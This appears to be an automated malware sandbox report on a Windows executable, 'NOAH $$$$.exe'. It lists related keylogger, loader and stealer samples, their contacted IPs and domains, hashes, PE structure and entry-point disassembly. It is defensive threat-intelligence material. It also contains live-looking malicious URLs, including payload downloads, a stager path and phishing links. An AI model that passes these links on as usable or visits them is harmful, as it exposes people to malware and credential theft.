                                                                                                                              T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                  j9eXB1sYLi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                    O82OCJNA3s.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      166.62.28.135ekeson and sons.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.astrobalajichennai.com/eo5u/?3flLi=3fixF&WDH4Z=ZNZ/xCb0AByMrT84YN+VaRUJuS/eLDsmfKlk5YP3EjsgSpc8R3rmuTDGRlyYjyOH7itkGMLpMQ==
                                                                                                                                      188.114.97.3file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • sosipisos.cc/SXQNMYTM.exe
                                                                                                                                      7RAK4mZ6nc.exeGet hashmaliciousMetasploitBrowse
                                                                                                                                      • downsexv.com:8080/pptFudI4N_bZd9h2vlE2HgX6nJupnvnNvPpodtqLmxX2OC5MJtjR8Cw2hx7Jj0FM_ofkLnmJ
                                                                                                                                      Shipping documents..exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.bzxs.info/v58i/
                                                                                                                                      icRicpJWczmiOf8.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.figa1digital.services/zjtq/
                                                                                                                                      xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • paste.ee/d/Sv5Cw
                                                                                                                                      ffsBbRe8UN.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.bayarcepat19.click/blmi/
                                                                                                                                      mBms4I508x.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.casesrep.site/qagl/
                                                                                                                                      PO-000172483.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.freedietbuilder.online/nnla/
                                                                                                                                      SECRFQ2024-0627 - ON HAND PROJECT - NEOM PROJECTS - SAUDI ELAF Co..exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.vrxlzluy.shop/d8g5/
                                                                                                                                      DHL_IMPORT_8236820594.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • www.figa1digital.services/r2pg/
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      reallyfreegeoip.orgJustificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      Solicita#U00e7#U00e3o de cota#U00e7#U00e3o.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      checkip.dyndns.comJustificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 193.122.6.168
                                                                                                                                      PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 132.226.247.73
                                                                                                                                      1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 158.101.44.242
                                                                                                                                      Solicita#U00e7#U00e3o de cota#U00e7#U00e3o.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 132.226.8.169
                                                                                                                                      Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 158.101.44.242
                                                                                                                                      xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 132.226.247.73
                                                                                                                                      QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 132.226.247.73
                                                                                                                                      Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 158.101.44.242
                                                                                                                                      T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 193.122.6.168
                                                                                                                                      lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 193.122.130.0
                                                                                                                                      mail.starofseasmarine.comSwift Detail 103.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 166.62.28.135
                                                                                                                                      z1PurchaseOrder.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 166.62.28.135
                                                                                                                                      api.telegram.orgJustificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      Solicita#U00e7#U00e3o de cota#U00e7#U00e3o.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      j9eXB1sYLi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      O82OCJNA3s.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      TELEGRAMRUJustificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      Solicita#U00e7#U00e3o de cota#U00e7#U00e3o.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      j9eXB1sYLi.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      O82OCJNA3s.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      CLOUDFLARENETUSNew_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                      • 104.26.13.205
                                                                                                                                      https://Saic.anastaclooverseas.com/zwfgemvfcbcitui/xivyvjldaquzs/Zgktmgjdfgpirwe89g0xmaersk/ixiswwcbzmfgee/jebqtppyunp/andrew.ma/inpoxqhfiww/saic.com/ozwunijponqp8Get hashmaliciousHTMLPhisherBrowse
                                                                                                                                      • 104.22.59.100
                                                                                                                                      Justificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 188.114.96.3
                                                                                                                                      https://krtra.com/t/onJtp2YcgmoQGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.17.25.14
                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                      • 104.21.5.155
                                                                                                                                      file.exeGet hashmaliciousLummaC, Amadey, HTMLPhisher, LummaC Stealer, Stealc, VidarBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      Invoice.msgGet hashmaliciousUnknownBrowse
                                                                                                                                      • 1.1.1.1
                                                                                                                                      file.exeGet hashmaliciousLummaC, Stealc, VidarBrowse
                                                                                                                                      • 172.67.133.135
                                                                                                                                      file.exeGet hashmaliciousUnknownBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      lime.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                      • 104.20.3.235
                                                                                                                                      ORACLE-BMC-31898USJustificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 193.122.6.168
                                                                                                                                      Zu52pZcHen.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                      • 152.67.212.187
                                                                                                                                      u5ge1oaSA6.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                      • 152.67.212.187
                                                                                                                                      G05J2DyCQA.exeGet hashmaliciousCobaltStrike, MetasploitBrowse
                                                                                                                                      • 152.67.212.187
                                                                                                                                      1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 158.101.44.242
                                                                                                                                      Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 158.101.44.242
                                                                                                                                      xBA TM06-Q6-11-24.docGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 158.101.44.242
                                                                                                                                      Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 158.101.44.242
                                                                                                                                      T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 193.122.6.168
                                                                                                                                      lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 193.122.130.0
                                                                                                                                      AS-26496-GO-DADDY-COM-LLCUSEn88bvC0fc.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 118.139.178.37
                                                                                                                                      Xteam30.htaGet hashmaliciousRHADAMANTHYSBrowse
                                                                                                                                      • 118.139.176.218
                                                                                                                                      Purchase Order PO61000016222.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                                      • 43.255.154.55
                                                                                                                                      rShippingDocuments240384.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 166.62.28.124
                                                                                                                                      nklarm5.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 104.238.97.228
                                                                                                                                      7950COPY.exeGet hashmaliciousFormBookBrowse
                                                                                                                                      • 198.12.233.232
                                                                                                                                      https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0Y7M4M4N1J5K4K6Y6N5R4&c=E,1,OlGTQS9-XwC2vBMWr7I6ylXZJam5iCAEz8vCZAxOsyVrFii_1IhqZZqiTz_dLP-ondxd1F0_mQoffiXjC_RNTQQ_48xVwrK55zuEfYrxqUa2Wr6UOEIpqcM,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                      • 208.109.245.23
                                                                                                                                      https://23.245.109.208.host.secureserver.net/E5V7V5K0D7J7U1G8T1M8U3B4G7B4C0&c=E,1,2fln-18Rcg-_y13WFwFZvQn3f1CXlYk0J_eiM8RKZuA6Djx49SsFA5in1hnyQJXLjWW1L6y7WaZ9eFSqcAvQerMcOF3C93rx-F5tfSihNA,,&typo=1Get hashmaliciousUnknownBrowse
                                                                                                                                      • 208.109.245.23
                                                                                                                                      la.bot.powerpc.elfGet hashmaliciousUnknownBrowse
                                                                                                                                      • 198.12.169.138
                                                                                                                                      yGktPvplJn.exeGet hashmaliciousPushdoBrowse
                                                                                                                                      • 107.180.98.101
                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                      54328bd36c14bd82ddaa0c04b25ed9adJustificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      lime.exeGet hashmaliciousLimeRATBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      Solicita#U00e7#U00e3o de cota#U00e7#U00e3o.bat.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      Quarto Proyectos S.L LISTA DE COMPRAS.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      QUOTATION_NOVQTRA071244#U00b7PDF.scr.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      Order.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      T4WYgRfsgy.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      lN65vHBnAu.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                                                      • 188.114.97.3
                                                                                                                                      3b5074b1b5d032e5620f69f9f700ff0eNew_Order_PO_GM5637H93.cmdGet hashmaliciousAgentTesla, DBatLoaderBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      Justificante de pago.exeGet hashmaliciousGuLoaderBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      PurchOrd_75238572.pdf.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      https://encirc-my.sharepoint.com/:u:/g/personal/gaynor_isaac_encirc360_com/EblrlakCiY9DrsVe1OHInZUBp5tMLaT62sfCgcgcXrtL7g?e=RtyeKGGet hashmaliciousUnknownBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      1730880308a25cd41259538643a6a02b355f33de1f56cb7e6d874f22aad09eac2596439da1840.dat-decoded.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      givenmebestthignswithgoodnewforentirerlifethingstobe.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      goodthingsforentireprocessgetmebackwithgoodnewsthings.htaGet hashmaliciousCobalt Strike, HTMLPhisherBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      DeGrsOm654.exeGet hashmaliciousQuasarBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      17308799445bb8287de7df48f59c1bda103369e3b3f101fa2921985dedc6b2bd9077b91ee0277.dat-decoded.exeGet hashmaliciousAsyncRAT, XWormBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      https://silver-antelope-m9cbjj.mystrikingly.com/?utm_source=vero&utm_medium=email&utm_content=control&utm_campaign=%5BFR%5D%20collected_email_notice&utm_term=Transactional&vero_conv=GBpYhsIpFSmO05TsgO2IN7eUtOGrwxJACirOVzlE4e6zWd4dm3DHEZyvaBDTtpAFZF0Cm3GCbumw_58AcHo6T3Gk48-PDYSdMzS-9ufSTA%3D%3DGet hashmaliciousUnknownBrowse
                                                                                                                                      • 149.154.167.220
                                                                                                                                      No context
                                                                                                                                      Process:C:\Users\user\Desktop\NOAH $$$$.exe
                                                                                                                                      File Type:data
                                                                                                                                      Category:dropped
                                                                                                                                      Size (bytes):248832
                                                                                                                                      Entropy (8bit):7.892443806546603
                                                                                                                                      Encrypted:false
                                                                                                                                      SSDEEP:6144:W9iOpaXm7lfoVScMG2XaQuDYA14rgdHrOQSQ4WrlZaI:WxaXOlfoVYKc/gdHqWbrlZP
                                                                                                                                      MD5:ADEF8627042AFAAF02CF019879BC1F7B
                                                                                                                                      SHA1:68D99FAA8744AA6C9385803498A2404FA8B680AE
                                                                                                                                      SHA-256:DD901A0625B0164E19249BB36F42BFAB5D226C87841EE3E68CBE3DA75744240A
                                                                                                                                      SHA-512:9A3BAABECB192A692CBB00BE26F1D1BC58A08CFA6E8A4D29A91E5D5761A1299398C1C6357B4E1269367005B4A12A7A7D825651FE3CE1191795B2A2BC55E8916B
                                                                                                                                      Malicious:false
                                                                                                                                      Reputation:low
                                                                                                                                      Preview:.l.6:0U8WLTX..6K.71V821M.EB7CS6W690U8SLTXJX6KR71V821MAEB7CS6.690['.BT.C...S{.wlZX>a50X$!W:.ZQ;V<8t:/xD><.X8.v~.a(-S&};Z<.0U8SLTX"H.f~F.(.C.3m4.IqpI).H.+3..*s;.Hg#.O.I.O.b+<+2.He.PN.I.2f{1&.:.Ic?[Z.<.;B7CS6W690U8SLTXJ...471V8btMA.C3C'.Wf90U8SLTX.X.JY68V8.0MAu@7CS6W..0U8CLTX.Y6KRw1V(21MCEB2CS6W690P8SLTXJX6[V71R82.vCE@7C.6W&90E8SLTHJX&KR71V8"1MAEB7CS6W6.%W8.LTXJ84KV.0V821MAEB7CS6W690U8SLTXJX6..61J821MAEB7CS6W690U8SLTXJX6KR7.[:2qMAEB7CS6W690.9S.UXJX6KR71V821MAEB7CS6W690U8}81 >X6KJ.0V8"1MA.C7CW6W690U8SLTXJX6kR7QxJVP9 EB..S6W.80UVSLT.KX6KR71V821MAE.7C..3WMQU8S.dXJX.IR7'V82;OAEB7CS6W690U8.LT.d*E9171V<.0MA%@7C.7W6.2U8SLTXJX6KR71.82qMAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX6KR71V821MAEB7CS6W690U8SLTXJX
                                                                                                                                      File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                      Entropy (8bit):7.456168707294147
                                                                                                                                      TrID:
                                                                                                                                      • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                                                                                      • Generic Win/DOS Executable (2004/3) 0.02%
                                                                                                                                      • DOS Executable Generic (2002/1) 0.02%
                                                                                                                                      • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                      File name:NOAH $$$$.exe
                                                                                                                                      File size:1'221'899 bytes
                                                                                                                                      MD5:3d10835ad12c3ab37cd08002b14c4cbf
                                                                                                                                      SHA1:ed8597462099dbaa058ec8cf11049effba9a1ae8
                                                                                                                                      SHA256:72a7133bde9504a1bce251af15a80c092489f583fd74e060fa3f8a07943bd4a4
                                                                                                                                      SHA512:d875a65c596ce2c52f89e20027dbbe370414420ffd1cfc3a8f5ee878bfad1928fea82a7a30147ee74ebd3cdec1afe9125d124bb6234bc1bbd3a2d460b07b71ee
                                                                                                                                      SSDEEP:24576:uRmJkcoQricOIQxiZY1iaCgHMIeLyf4Znaoe1oNWqxs:7JZoQrbTFZY1iaC2AA4ZnReyC
                                                                                                                                      TLSH:1645E121B9C68076C2B323B19E7FF769963D793A1336D19723C82E315EA05416B29733
                                                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........................1b.......P.).....Q.......y.......i..........}....N.......d.......`.......m.......g.....Rich............PE..L..
                                                                                                                                      Icon Hash:1733312925935517
                                                                                                                                      Entrypoint:0x4165c1
                                                                                                                                      Entrypoint Section:.text
                                                                                                                                      Digitally signed:false
                                                                                                                                      Imagebase:0x400000
                                                                                                                                      Subsystem:windows gui
                                                                                                                                      Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                                                                                                                      DLL Characteristics:TERMINAL_SERVER_AWARE
                                                                                                                                      Time Stamp:0x4F25BAEC [Sun Jan 29 21:32:28 2012 UTC]
                                                                                                                                      TLS Callbacks:
                                                                                                                                      CLR (.Net) Version:
                                                                                                                                      OS Version Major:5
                                                                                                                                      OS Version Minor:0
                                                                                                                                      File Version Major:5
                                                                                                                                      File Version Minor:0
                                                                                                                                      Subsystem Version Major:5
                                                                                                                                      Subsystem Version Minor:0
                                                                                                                                      Import Hash:d3bf8a7746a8d1ee8f6e5960c3f69378
                                                                                                                                      Instruction
                                                                                                                                      call 00007F44B0E78EEBh
                                                                                                                                      jmp 00007F44B0E6FD5Eh
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      int3
                                                                                                                                      push ebp
                                                                                                                                      mov ebp, esp
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      mov esi, dword ptr [ebp+0Ch]
                                                                                                                                      mov ecx, dword ptr [ebp+10h]
                                                                                                                                      mov edi, dword ptr [ebp+08h]
                                                                                                                                      mov eax, ecx
                                                                                                                                      mov edx, ecx
                                                                                                                                      add eax, esi
                                                                                                                                      cmp edi, esi
                                                                                                                                      jbe 00007F44B0E6FEDAh
                                                                                                                                      cmp edi, eax
                                                                                                                                      jc 00007F44B0E70076h
                                                                                                                                      cmp ecx, 00000080h
                                                                                                                                      jc 00007F44B0E6FEEEh
                                                                                                                                      cmp dword ptr [004A9724h], 00000000h
                                                                                                                                      je 00007F44B0E6FEE5h
                                                                                                                                      push edi
                                                                                                                                      push esi
                                                                                                                                      and edi, 0Fh
                                                                                                                                      and esi, 0Fh
                                                                                                                                      cmp edi, esi
                                                                                                                                      pop esi
                                                                                                                                      pop edi
                                                                                                                                      jne 00007F44B0E6FED7h
                                                                                                                                      jmp 00007F44B0E702B2h
                                                                                                                                      test edi, 00000003h
                                                                                                                                      jne 00007F44B0E6FEE6h
                                                                                                                                      shr ecx, 02h
                                                                                                                                      and edx, 03h
                                                                                                                                      cmp ecx, 08h
                                                                                                                                      jc 00007F44B0E6FEFBh
                                                                                                                                      rep movsd
                                                                                                                                      jmp dword ptr [00416740h+edx*4]
                                                                                                                                      mov eax, edi
                                                                                                                                      mov edx, 00000003h
                                                                                                                                      sub ecx, 04h
                                                                                                                                      jc 00007F44B0E6FEDEh
                                                                                                                                      and eax, 03h
                                                                                                                                      add ecx, eax
                                                                                                                                      jmp dword ptr [00416654h+eax*4]
                                                                                                                                      jmp dword ptr [00416750h+ecx*4]
                                                                                                                                      nop
                                                                                                                                      jmp dword ptr [004166D4h+ecx*4]
                                                                                                                                      nop
                                                                                                                                      inc cx
                                                                                                                                      add byte ptr [eax-4BFFBE9Ah], dl
                                                                                                                                      inc cx
                                                                                                                                      add byte ptr [ebx], ah
                                                                                                                                      ror dword ptr [edx-75F877FAh], 1
                                                                                                                                      inc esi
                                                                                                                                      add dword ptr [eax+468A0147h], ecx
                                                                                                                                      add al, cl
                                                                                                                                      jmp 00007F44B32E86D7h
                                                                                                                                      add esi, 03h
                                                                                                                                      add edi, 03h
                                                                                                                                      cmp ecx, 08h
                                                                                                                                      jc 00007F44B0E6FE9Eh
                                                                                                                                      rep movsd
                                                                                                                                      jmp dword ptr [00000000h+edx*4]
                                                                                                                                      Programming Language:
                                                                                                                                      • [ C ] VS2010 SP1 build 40219
                                                                                                                                      • [C++] VS2010 SP1 build 40219
                                                                                                                                      • [ C ] VS2008 SP1 build 30729
                                                                                                                                      • [IMP] VS2008 SP1 build 30729
                                                                                                                                      • [ASM] VS2010 SP1 build 40219
                                                                                                                                      • [RES] VS2010 SP1 build 40219
                                                                                                                                      • [LNK] VS2010 SP1 build 40219
                                                                                                                                      NameVirtual AddressVirtual Size Is in Section
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IMPORT0x8d41c0x154.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESOURCE0xab0000x9328.rsrc
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_IAT0x820000x844.rdata
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                      IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                      NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                      .text0x10000x8061c0x8080061ffce4768976fa0dd2a8f6a97b1417aFalse0.5583182605787937data6.684690148171278IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                      .rdata0x820000xdfc00xe0000354bc5f2376b5e9a4a3ba38b682dff1False0.36085728236607145data4.799741132252136IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      .data0x900000x1a7580x68008033f5a38941b4685bc2299e78f31221False0.15324519230769232data2.1500715391677487IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                      .rsrc0xab0000x93280x9400495451d7eb8326bd9fa2714869ea6de8False0.49002322635135137data5.541804843154628IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                      NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                      RT_ICON0xab5c80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                                                                                                                      RT_ICON0xab6f00x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                                                                                                                      RT_ICON0xab8180x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                                                                                                                      RT_ICON0xab9400x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishGreat Britain0.48109756097560974
                                                                                                                                      RT_ICON0xabfa80x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishGreat Britain0.5672043010752689
                                                                                                                                      RT_ICON0xac2900x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishGreat Britain0.6418918918918919
                                                                                                                                      RT_ICON0xac3b80xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishGreat Britain0.7044243070362474
